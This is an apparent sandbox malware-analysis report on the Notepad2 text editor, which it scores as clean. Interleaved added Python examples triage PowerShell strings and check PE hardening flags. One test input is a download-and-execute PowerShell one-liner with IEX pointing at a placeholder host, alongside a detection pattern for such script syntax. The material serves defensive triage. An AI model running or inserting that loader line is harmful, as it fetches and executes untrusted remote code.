Windows Analysis Report Notepad2.exe

Overview

General Information

Sample Name: Notepad2.exe
Analysis ID: 435307
MD5: f6d48867d815d6322199e90aa71a8c69
SHA1: f8f9c191d37b643a20870ab8d0af39780c4677ff
SHA256: c6086336a827a9852ee5cf6f46ffb7b1fccf82f194132a0c8a217d1240654f9f

Detection

Score: 1
Range: 0 - 100
Whitelisted: false
Confidence: 80%

Signatures

PE file contains strange resources
Sample file is different than original file name gathered from version info

Classification

Source: Notepad2.exe Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Notepad2.exe String found in binary or memory: http://www.flos-freeware.ch
Source: Notepad2.exe String found in binary or memory: http://www.flos-freeware.ch.JNo
Source: Notepad2.exe String found in binary or memory: http://www.flos-freeware.chFlorian
Source: Notepad2.exe String found in binary or memory: http://www.flos-freeware.chflorian.balmer

System Summary:

PE file contains strange resources
Source: Notepad2.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Notepad2.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Notepad2.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Sample file is different than original file name gathered from version info
Source: Notepad2.exe Binary or memory string: OriginalFilename vs Notepad2.exe
Source: Notepad2.exe, 00000000.00000002.942380607.00000000047B0000.00000002.00000001.sdmp Binary or memory string: originalfilename vs Notepad2.exe
Source: Notepad2.exe, 00000000.00000002.942380607.00000000047B0000.00000002.00000001.sdmp Binary or memory string: OriginalFilenamepropsys.dll.mui@ vs Notepad2.exe
Source: Notepad2.exe, 00000003.00000002.942249073.00000000047F0000.00000002.00000001.sdmp Binary or memory string: originalfilename vs Notepad2.exe
Source: Notepad2.exe, 00000003.00000002.942249073.00000000047F0000.00000002.00000001.sdmp Binary or memory string: OriginalFilenamepropsys.dll.mui@ vs Notepad2.exe
Source: Notepad2.exe, 00000005.00000002.934686132.0000000002F30000.00000002.00000001.sdmp Binary or memory string: originalfilename vs Notepad2.exe
Source: Notepad2.exe, 00000005.00000002.934686132.0000000002F30000.00000002.00000001.sdmp Binary or memory string: OriginalFilenamepropsys.dll.mui@ vs Notepad2.exe
Source: classification engine Classification label: clean1.winEXE@3/0@0/0
Source: Notepad2.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\Notepad2.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: Notepad2.exe String found in binary or memory: et-event get-eventlog get-eventsubscriber get-executionpolicy get-formatdata get-help get-history get-host get-hotfix get-item get-itemproperty get-job get-location get-member get-module get-pfxcertificate get-process get-psbreakpoint get-pscallstack get-psdri
Source: Notepad2.exe String found in binary or memory: add-computer add-content add-history add-member add-pssnapin add-type checkpoint-computer clear-content clear-eventlog clear-history clear-host clear-item clear-itemproperty clear-variable compare-object complete-transaction connect-wsman convertfrom-csv convertfrom-securestring convertfrom-stringdata convert-path convertto-csv convertto-html convertto-securestring convertto-xml copy-item copy-itemproperty debug-process disable-computerrestore disable-psbreakpoint disable-psremoting disable-pssessionconfiguration disable-wsmancredssp disconnect-wsman enable-computerrestore enable-psbreakpoint enable-psremoting enable-pssessionconfiguration enable-wsmancredssp enter-pssession exit-pssession export-alias export-clixml export-console export-counter export-csv export-formatdata export-modulemember export-pssession foreach-object format-custom format-list format-table format-wide get-acl get-alias get-authenticodesignature get-childitem get-command get-computerrestorepoint get-content get-counter get-credential get-culture get-date get-event get-eventlog get-eventsubscriber get-executionpolicy get-formatdata get-help get-history get-host get-hotfix get-item get-itemproperty get-job get-location get-member get-module get-pfxcertificate get-process get-psbreakpoint get-pscallstack get-psdrive get-psprovider get-pssession get-pssessionconfiguration get-pssnapin get-random get-service get-tracesource get-transaction get-uiculture get-unique get-variable get-verb get-winevent get-wmiobject get-wsmancredssp get-wsmaninstance group-object import-alias import-clixml import-counter import-csv import-localizeddata import-module import-pssession invoke-command invoke-expression invoke-history invoke-item invoke-wmimethod invoke-wsmanaction join-path limit-eventlog measure-command measure-object move-item move-itemproperty new-alias new-event new-eventlog new-item new-itemproperty new-module new-modulemanifest new-object 
new-psdrive new-pssession new-pssessionoption new-service new-timespan new-variable new-webserviceproxy new-wsmaninstance new-wsmansessionoption out-default out-file out-gridview out-host out-null out-printer out-string pop-location push-location read-host receive-job register-engineevent register-objectevent register-pssessionconfiguration register-wmievent remove-computer remove-event remove-eventlog remove-item remove-itemproperty remove-job remove-module remove-psbreakpoint remove-psdrive remove-pssession remove-pssnapin remove-variable remove-wmiobject remove-wsmaninstance rename-item rename-itemproperty reset-computermachinepassword resolve-path restart-computer restart-service restore-computer resume-service select-object select-string select-xml send-mailmessage set-acl set-alias set-authenticodesignature set-content set-date set-executionpolicy set-item set-itemproperty set-location set-psbreakpoint set-psdebug set-pssessionconfiguration set-service set-strictmode set-tracesource set-variable set-wmiinstance set-wsmaninstance set-wsmanqu
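The cmdlet strings above are the kind of hit that needs a second look before it counts against a sample: a text editor's syntax-highlighting keyword list and an embedded PowerShell script both contain cmdlet names. The following triage function is an added example, not the sandbox's code or Notepad2's. It separates the two with three cheap features: the share of whitespace-separated tokens that are bare Verb-Noun names, whether those names appear in sorted order (lexer word lists are sorted, scripts are not), and whether any actual script syntax is present. The inputs are constructed: REPORT_EXCERPT is a trimmed copy of the list in the report, LOADER is a made-up download-and-execute one-liner pointing at example.invalid.

```python
"""Triage for a PowerShell cmdlet string of the kind a sandbox extracts from a
binary. Added example, not the sandbox's code. A keyword list and an embedded
script both contain cmdlet names; three features tell them apart: the share
of tokens that are bare Verb-Noun names, whether they are in sorted order, and
whether real script syntax is present."""
import re

CMDLET = re.compile(r"^[a-z]+-[a-z0-9]+$", re.I)
# Constructs a keyword list never contains but a script or one-liner usually does:
# variables, pipelines, common powershell.exe switches, IEX, char/base64 tricks.
SCRIPT_SYNTAX = re.compile(
    r"\$\w+|\|\s*\w|(?<!\w)-(?:e|enc|encodedcommand|nop|noprofile|w|windowstyle)\b"
    r"|\biex\b|\[char\]|FromBase64String|\(\s*New-Object\b",
    re.I,
)


def triage_powershell_string(s: str, min_cmdlets: int = 15) -> dict:
    """Classify an extracted string as 'keyword-list', 'script' or 'inconclusive'."""
    tokens = s.split()
    cmdlets = [t for t in tokens if CMDLET.match(t)]
    share = len(cmdlets) / len(tokens) if tokens else 0.0
    in_order = cmdlets == sorted(cmdlets, key=str.lower)   # lexer word lists are sorted
    has_syntax = bool(SCRIPT_SYNTAX.search(s))
    if has_syntax:
        verdict = "script"          # worth reading the surrounding bytes and the behaviour trace
    elif len(cmdlets) >= min_cmdlets and share > 0.9 and in_order:
        verdict = "keyword-list"    # consistent with a syntax-highlighting word list
    else:
        verdict = "inconclusive"
    return {"verdict": verdict, "cmdlets": len(cmdlets), "share": round(share, 2),
            "sorted": in_order, "script_syntax": has_syntax}


# Constructed inputs: a trimmed copy of the report's list, and a made-up loader one-liner.
REPORT_EXCERPT = (
    "get-event get-eventlog get-eventsubscriber get-executionpolicy get-formatdata "
    "get-help get-history get-host get-hotfix get-item get-itemproperty get-job "
    "get-location get-member get-module get-pfxcertificate get-process get-psbreakpoint "
    "get-pscallstack get-psdrive"
)
LOADER = "$u = 'http://example.invalid/a.ps1'; IEX (New-Object Net.WebClient).DownloadString($u)"

if __name__ == "__main__":
    for label, s in (("report excerpt", REPORT_EXCERPT), ("loader", LOADER)):
        print(label, triage_powershell_string(s))
```

A "keyword-list" verdict only says the string is consistent with a lexer word list; the behaviour section of the report, not the string, is what confirms that no PowerShell was actually spawned.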
Source: unknown Process created: C:\Users\user\Desktop\Notepad2.exe 'C:\Users\user\Desktop\Notepad2.exe' -install
Source: unknown Process created: C:\Users\user\Desktop\Notepad2.exe 'C:\Users\user\Desktop\Notepad2.exe' /install
Source: unknown Process created: C:\Users\user\Desktop\Notepad2.exe 'C:\Users\user\Desktop\Notepad2.exe' /load
Source: C:\Users\user\Desktop\Notepad2.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9FC8E510-A27C-4B3B-B9A3-BF65F00256A8}\InProcServer32
Source: Notepad2.exe Static PE information: Image base 0x140000000 > 0x60000000
Source: Notepad2.exe Static PE information: section name: RT_CURSOR
Source: Notepad2.exe Static PE information: section name: RT_BITMAP
Source: Notepad2.exe Static PE information: section name: RT_ICON
Source: Notepad2.exe Static PE information: section name: RT_MENU
Source: Notepad2.exe Static PE information: section name: RT_DIALOG
Source: Notepad2.exe Static PE information: section name: RT_STRING
Source: Notepad2.exe Static PE information: section name: RT_ACCELERATOR
Source: Notepad2.exe Static PE information: section name: RT_GROUP_ICON
Source: Notepad2.exe Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
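The static PE lines above (DllCharacteristics flags, the ImageBase comparison, the .text section flags) can be reproduced without the sandbox. The block below is an added example, not the sandbox's code or Notepad2's: it parses just the DOS, file, optional and section headers with the standard library and turns them into the present hardening flags plus a list of findings. It runs offline on two constructed PE32+ headers (one carrying the flags the report lists plus HIGH_ENTROPY_VA, one with every mitigation off and a writable .text); `check_pe(open(path, "rb").read())` runs the same checks on a real file.

```python
"""Static PE header checks of the kind a sandbox report lists. Added example,
not the sandbox's code. Only the DOS, file, optional and section headers are
parsed; that is enough for DllCharacteristics, ImageBase and section flags."""
import struct

# IMAGE_OPTIONAL_HEADER.DllCharacteristics bits (winnt.h)
DLLCHAR = {
    0x0020: "HIGH_ENTROPY_VA",
    0x0040: "DYNAMIC_BASE",
    0x0100: "NX_COMPAT",
    0x0400: "NO_SEH",
    0x4000: "GUARD_CF",
    0x8000: "TERMINAL_SERVER_AWARE",
}
# IMAGE_SECTION_HEADER.Characteristics bits (winnt.h)
SCN_CNT_CODE, SCN_CNT_INITIALIZED_DATA = 0x00000020, 0x00000040
SCN_MEM_EXECUTE, SCN_MEM_READ, SCN_MEM_WRITE = 0x20000000, 0x40000000, 0x80000000


def parse_pe(data: bytes) -> dict:
    """Read the headers needed for the checks; raises on a non-PE input."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ image")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("bad PE signature")
    fh = e_lfanew + 4                                   # IMAGE_FILE_HEADER, 20 bytes
    _machine, nsec, _, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", data, fh)
    opt = fh + 20                                       # IMAGE_OPTIONAL_HEADER
    magic = struct.unpack_from("<H", data, opt)[0]
    if magic == 0x20B:                                  # PE32+: 8-byte ImageBase at +24
        image_base = struct.unpack_from("<Q", data, opt + 24)[0]
    elif magic == 0x10B:                                # PE32: BaseOfData, then 4-byte ImageBase at +28
        image_base = struct.unpack_from("<I", data, opt + 28)[0]
    else:
        raise ValueError("unknown optional header magic 0x%x" % magic)
    dll_chars = struct.unpack_from("<H", data, opt + 70)[0]   # same offset in both formats
    sections = []
    for i in range(nsec):
        off = opt + opt_size + 40 * i                   # IMAGE_SECTION_HEADER, 40 bytes each
        name = struct.unpack_from("<8s", data, off)[0].rstrip(b"\0").decode("ascii", "replace")
        chars = struct.unpack_from("<I", data, off + 36)[0]
        sections.append((name, chars))
    return {"pe32plus": magic == 0x20B, "image_base": image_base,
            "dll_characteristics": dll_chars, "sections": sections}


def check_pe(data: bytes) -> dict:
    """Hardening flags present, the image base, and a list of things worth a look."""
    pe = parse_pe(data)
    dc = pe["dll_characteristics"]
    flags = sorted(name for bit, name in DLLCHAR.items() if dc & bit)
    findings = []
    if not dc & 0x0040:
        findings.append("no DYNAMIC_BASE: image opts out of ASLR")
    if not dc & 0x0100:
        findings.append("no NX_COMPAT: image opts out of DEP")
    if pe["pe32plus"] and not dc & 0x0020:
        findings.append("64-bit image without HIGH_ENTROPY_VA")
    # An ImageBase above 0x60000000 is only odd for a 32-bit image; 0x140000000 is the
    # default 64-bit linker base, so a report line like "0x140000000 > 0x60000000" is noise.
    if not pe["pe32plus"] and pe["image_base"] > 0x60000000:
        findings.append("32-bit image with unusually high ImageBase 0x%x" % pe["image_base"])
    for name, chars in pe["sections"]:
        if chars & SCN_MEM_EXECUTE and chars & SCN_MEM_WRITE:
            findings.append("section %s is writable and executable" % name)
        if chars & SCN_CNT_CODE and not chars & SCN_MEM_EXECUTE:
            findings.append("section %s holds code but is not executable" % name)
    return {"flags": flags, "image_base": pe["image_base"], "findings": findings}


def build_sample_pe(dll_chars: int, sections) -> bytes:
    """Constructed minimal PE32+ header (headers only, no code): demo input, not a real binary."""
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", 0x40)   # e_lfanew = 0x40
    opt = bytearray(240)                                         # IMAGE_OPTIONAL_HEADER64
    struct.pack_into("<H", opt, 0, 0x20B)
    struct.pack_into("<Q", opt, 24, 0x140000000)
    struct.pack_into("<H", opt, 68, 2)                           # IMAGE_SUBSYSTEM_WINDOWS_GUI
    struct.pack_into("<H", opt, 70, dll_chars)
    fh = struct.pack("<HHIIIHH", 0x8664, len(sections), 0, 0, 0, len(opt), 0x22)
    secs = b"".join(struct.pack("<8sIIIIIIHHI", n.encode(), 0, 0, 0, 0, 0, 0, 0, 0, c)
                    for n, c in sections)
    return dos + b"PE\0\0" + fh + bytes(opt) + secs


# Constructed samples: the report's flags plus HIGH_ENTROPY_VA, and a deliberately weak image.
HARDENED = build_sample_pe(0x8000 | 0x0040 | 0x0100 | 0x0020, [
    (".text", SCN_CNT_CODE | SCN_MEM_EXECUTE | SCN_MEM_READ),
    (".rdata", SCN_CNT_INITIALIZED_DATA | SCN_MEM_READ),
    (".data", SCN_CNT_INITIALIZED_DATA | SCN_MEM_READ | SCN_MEM_WRITE),
])
WEAK = build_sample_pe(0, [(".text", SCN_CNT_CODE | SCN_MEM_EXECUTE | SCN_MEM_READ | SCN_MEM_WRITE)])

if __name__ == "__main__":
    for label, blob in (("hardened", HARDENED), ("weak", WEAK)):
        print(label, check_pe(blob))
```

Two caveats on the other static findings above. The OriginalFilename mismatches whose source is a memory dump name propsys.dll.mui, the version resource of a system DLL mapped into the process, not the sample's own VS_VERSIONINFO; only the on-disk comparison speaks to the sample, and this block does not parse the version resource. And the function near the end of the report that calls GetSystemTimeAsFileTime, GetCurrentProcessId, GetCurrentThreadId, GetTickCount and QueryPerformanceCounter in sequence is the MSVC CRT's __security_init_cookie seeding the /GS stack cookie, present in any MSVC build.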
Source: C:\Users\user\Desktop\Notepad2.exe Process information set: NOOPENFILEERRORBOX (22 identical entries in the report)
Source: Notepad2.exe, 00000000.00000002.934516142.0000000001300000.00000002.00000001.sdmp, Notepad2.exe, 00000003.00000002.934520969.0000000001360000.00000002.00000001.sdmp, Notepad2.exe, 00000005.00000002.934520681.0000000001A20000.00000002.00000001.sdmp Binary or memory string: Program Manager
Source: Notepad2.exe, Notepad2.exe, 00000003.00000002.934520969.0000000001360000.00000002.00000001.sdmp, Notepad2.exe, 00000005.00000002.934520681.0000000001A20000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: Notepad2.exe, 00000000.00000002.934516142.0000000001300000.00000002.00000001.sdmp, Notepad2.exe, 00000003.00000002.934520969.0000000001360000.00000002.00000001.sdmp, Notepad2.exe, 00000005.00000002.934520681.0000000001A20000.00000002.00000001.sdmp Binary or memory string: Progman
Source: Notepad2.exe Binary or memory string: * - =%s=%sIsAppThemedSetCurrentProcessExplicitAppUserModelIDshell32.dll(default)OpacityLevelSetLayeredWindowAttributesUser32ResizeDlg%CSIDL:MYDOCUMENTS%-n .lnk%.2iCloseThemeDataGetThemeSysFontWINDOWSTYLE;WINDOWOpenThemeDatauxtheme.dllTrayNotifyWndShell_TrayWnd] [%i ToolbarReBarWindow32%02iToolbar LabelsToolbarWindow32OVRCR+LFUnicode BE BOM9'999'999 BytesLn 9'999'999 : 9'999'999 Col 9'999'999 : 999 Sel 9'999'999StickyWindowPositionSingleFileInstanceReuseWindowWindow%ix%i Maximized%ix%i SizeY%ix%i SizeX%ix%i PosY%ix%i PosXBitmapDisabledBitmapHotBitmapDefaultToolbar ImagesAutoReloadTimeoutFileCheckInvervalFileDlgFiltersDefaultDirectory ."DefaultExtensiontxtFindReplaceDlgPosYFindReplaceDlgPosXFavoritesDlgSizeYFavoritesDlgSizeXOpenWithDlgSizeYOpenWithDlgSizeXFileMRUDlgSizeYFileMRUDlgSizeXRecodeDlgSizeYRecodeDlgSizeXEncodingDlgSizeYEncodingDlgSizeXShowStatusbarShowToolbarToolbarButtonsTransparentModeMinimizeToTrayAlwaysOnTopEscFunctionResetFileWatchingFileWatchingModeSaveBeforeRunningToolsPrintMarginBottomPrintMarginRightPrintMarginTopPrintMarginLeftPrintZoomPrintColorModePrintFooterPrintHeaderFixTrailingBlanksFixLineEndingsDefaultEOLModeNoEncodingTagsLoadASCIIasUTF8SkipUnicodeDetectionDefaultEncodingViewEOLsViewWhiteSpaceShowLineNumbersShowSelectionMarginLongLineModeLongLinesLimitMarkLongLinesIndentWidthTabWidthBackspaceUnindentsTabIndentsTabsAsSpacesShowIndentGuidesAutoIndentHighlightCurrentLineAutoCloseTagsMatchBracesShowWordWrapSymbolsWordWrapSymbolsWordWrapIndentWordWrapModeWordWrapPathNameFormatFavoritesOpenWithDirNoFindWrapCloseReplaceCloseFindSaveFindReplaceSaveRecentFilesSaveSettingsSettings 
"%i,%i,%i,%i,%iPOSFLTRBMPOS:%i,%i*?sysmru=appid=CRLFCRLFUTF-8-SIGNATUREUTF8-SIGNATUREUTF-8SIGNATUREUTF8SIGNATUREUTF-8SIGUTF8SIGUTF-8UTF8UNICODE-BEUNICODEBEWUNICODEMBCSAANSI-/-+ShellUseSystemMRUShellAppUserModelIDNoFileVariablesNoCGIGuessNoHTMLGuessSimpleIndentGuidesToolbarLookNoFadeHiddenPortableMyDocsRelativeFileMRUMultiFileArgNotepad2Notepad2.ini.ini
Source: Notepad2.exe, 00000000.00000002.934516142.0000000001300000.00000002.00000001.sdmp, Notepad2.exe, 00000003.00000002.934520969.0000000001360000.00000002.00000001.sdmp, Notepad2.exe, 00000005.00000002.934520681.0000000001A20000.00000002.00000001.sdmp Binary or memory string: Progmanlock
Source: C:\Users\user\Desktop\Notepad2.exe Code function: 0_2_00007FF76B5FAA98 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter, 0_2_00007FF76B5FAA98
No contacted IP infos